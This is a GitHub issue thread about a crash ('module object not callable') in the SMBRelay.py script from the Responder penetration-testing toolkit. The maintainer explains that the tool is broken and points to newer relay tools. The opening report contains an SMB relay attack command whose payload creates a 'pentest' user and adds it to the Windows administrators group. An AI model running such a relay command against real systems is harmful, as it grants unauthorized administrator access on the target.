### ISSUE TITLE
Module object not callable

### ISSUE THREAD

**Issue by T-S-A** [lgandx/Responder#8]
python SMBRelay.py -i [REDACTED] -c 'net user pentest [REDACTED] /add &&net localgroup administrators pentest /add' -t [REDACTED] -u Administrator

Responder SMBRelay 0.1
Please send bugs/comments to: laurent.gaffie@gmail.com
Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..
Usernames  to relay (-u) are case sensitive.
To kill this script hit CRTL-C or Enter
Will relay credentials for these users: Administrator

Target is running:  ('Windows Server 2008 R2 Datacenter 7601 Service Pack 1', 'Windows Server 2008 R2 Datacenter 6.1')
Unhandled exception in thread started by <function RunInloop at 0x7fed3538e0c8>
Traceback (most recent call last):
  File "SMBRelay.py", line 406, in RunInloop
    worker = RunRelay(Target,Command,Domain)
  File "SMBRelay.py", line 223, in RunRelay
    s = socket(AF_INET, SOCK_STREAM)
TypeError: 'module' object is not callable

**Comment by Khairul1811** [comment]
What

**Comment by T-S-A** [comment]
Operating System Information:
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.5 LTS
Release:	14.04
Codename:	trusty

**Comment by Khairul1811** [comment]
Ok

**Comment by lgandx** [comment]
Thanks for your report.
I need to rebuilt this tool entirely, with the massive merge many tools has broken.
In the meantime, I'm working on something else, related with relaying, which should be quite cool.
Hoping to release it in the next few days.

**Comment by T-S-A** [comment]
Nice! I can't wait to see your new work.

**Comment by T-S-A** [comment]
I'd be happy to beta test anything for you and report bugs I find.

**Comment by lgandx** [comment]
Alright it's out! You can try the new tool here: tools/RelayHTTPSMB/HTTPToSMBRelay.py
Will see what I do with SMB to SMB relay, I'll probably implement ntlmv2 to ntlmv2.
Thanks for your report!

**Comment by T-S-A** [comment]
Very nice! I've been doing that with MSF and it takes multiple network
requests to get code execution... Can't wait to try it out. You the man!

**Comment by lgandx** [comment]
It's out!
try:
./tools/MultiRelay.py

**Comment by T-S-A** [comment]
Nice!
